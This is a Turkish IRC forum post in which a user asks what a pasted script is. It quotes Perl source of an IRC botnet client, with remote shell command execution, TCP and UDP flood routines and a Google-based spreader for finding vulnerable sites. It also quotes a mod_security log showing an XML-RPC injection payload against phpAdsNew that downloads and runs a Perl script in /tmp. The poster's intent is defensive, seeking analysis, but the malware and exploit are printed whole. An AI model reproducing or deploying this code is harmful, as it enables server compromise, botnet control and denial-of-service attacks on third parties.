Konu: Bu nedir Acaba?
Tekil Mesaj gösterimi
Alt 01 Eylül 2006, 17:53   #5
Çevrimdışı
BaGeR
Kullanıcıların profil bilgileri misafirlere kapatılmıştır.
IF Ticaret Sayısı: (0)
IF Ticaret Yüzdesi:(%)
Yanıt: Bu nedir Acaba?



Alıntı:
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}

sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}

sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}

sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}

# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#

sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);

my dominios = ("com","net","org","info","gov", "gob","gub","xxx",
"eu","mil","edu","aero","name","us","ca","mx","pa" ,"ni","cu","pr","ve","co","pe","ec",

"py","cl","uy","ar","br","bo","au","nz","cz","kr", "jp","th","tw","ph","cn","fi","de","es","pt","ch", "se","su","it","gr","al","dk","pl","biz","int","pr o","museum","coop",

"af","ad","ao","ai","aq","ag","an","sa","dz","ar", "am","aw","at","az","bs","bh","bd","bb","be","bz", "bj","bm","bt","by","ba","bw","bn","bg","bf"," bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj", "dm","ci","cr","hr","kp","eg","sv","aw","er"," sk",

"ee","et","ge","fi","fr","ga","gs","gh","gi","gb", "uk","gd","gl","gp","gu","gt","gg","gn","gw","gq", "gy","gf","ht","nl","hn","hk","hu","in","id"," ir",

"iq","ie","is","ac","bv","cx","im","nf","ky","cc", "ck","fo","hm","fk","mp","mh","pw","um","sb","sj", "tc","vg","vi","wf","il","jm","je","jo","kz"," ke",

"ki","kg","kw","lv","ls","lb","ly","lr","li","lt", "lu","mo","mk","mg","my","mw","mv","ml","mt","mq", "ma","mr","mu","yt","md","mc","mn","ms","mz"," mm",

"na","nr","np","ni","ne","ng","nu","no","nc","om", "pk","ps","pg","pn","pf","qa","sy","cf","la","re", "rw","ro","ru","eh","kn","ws","as","sm","pm"," vc",

"sh","lc","va","st","sn","sc","sl","sg","so","lk", "za","sd","se","sr","sz","rj","tz","io","tf","tp", "tg","to","tt","tn","tr","tm","tv","ug","ua"," uz",
"vu","vn","ye","yu","cd","zm","zw","");
my str;

foreach $dom (dominios)
{
push (str,"%22inurl%3Amodules.php%3Fname%3DSQuery%22+si te%3A".$dom."%20");
}

my $query="
Bu forumdaki linkleri ve resimleri görebilmek için en az 25 mesajınız olması gerekir.
my lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (lst,$1);
}
}
return (lst);
}

sub http_query($){
my ($url) = _;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp" ) or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my r = <$sock>;
$page="r";
alarm 0;
close($sock);
};
return $page;

}
-- cut --




It looks like it's connecting to an irc server specified in the configuration section. I've installed mod_security on that machine to track this issue (I thought that it's a mambo/joomla clone) and this is a log from modsecurity :



-- cut --
==820d6169==============================
Request: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] 64.18.150.130 - - [17/Aug/2006:07:56:41 +0100] "POST /banmanagerold/adxmlrpc.php HTTP/1.1" 403 428 "-" "Internet Explorer 6.0" ROQTKVBXgIIAAHf6FiI "-"
----------------------------------------
POST /banmanagerold/adxmlrpc.php HTTP/1.1
Connection: TE, close
Content-Length: 557
Host: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
TE: deflate,gzip;q=0.3
User-Agent: Internet Explorer 6.0
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "(chr|fwrite|fopen|system|echr|passthru|popen|proc _open|shell_exec|exec|proc_nice|proc_terminate|pro c_get_status|proc_close|pfsockopen|leak|apache_chi ld_terminate|posix_kill|posix_mkfifo|posix_setpgid |posix_setsid|posix_setuid|phpinfo)\\(.*\\)\\;" at POST_PAYLOAD [id "300008"][rev "1"] [msg "Generic PHP exploit pattern denied"] [severity "CRITICAL"]

557
<?xml
version="1.0"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>',''));
system('unset HISTFILE;cd /tmp;GET [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] > top;perl top;mv top sess_2e04828799532f31e651238bda569ca7; wget [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...] top;mv top sess_2e04828799532f31e651238bda569ca3'); die; /*</name></value></param></params></methodCall>

HTTP/1.1 403 Forbidden
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
--820d6169--
-- cut --

/banmanagerold/adxmlrpc.php - it's a part of the phpAdsNew (Banner management software). Affected version that I found on my server is : phpAdsNew 2.0.4-pr2

Arkadaslar bu nedir.? yada bo botun neye Yaradıgını çözemedim. Sanırım PHP dili ile yazılmış. Bunu çözebilecek Var mık ? yada bize bilgi verebilecek.(TEK MESAJA SIGMIYORDU ONDAN PARCA PARCA VERMEK SORUNDA KALDIM)

 
Alıntı ile Cevapla

IRCForumlari.NET Reklamlar
sohbet odaları eglen sohbet reklamver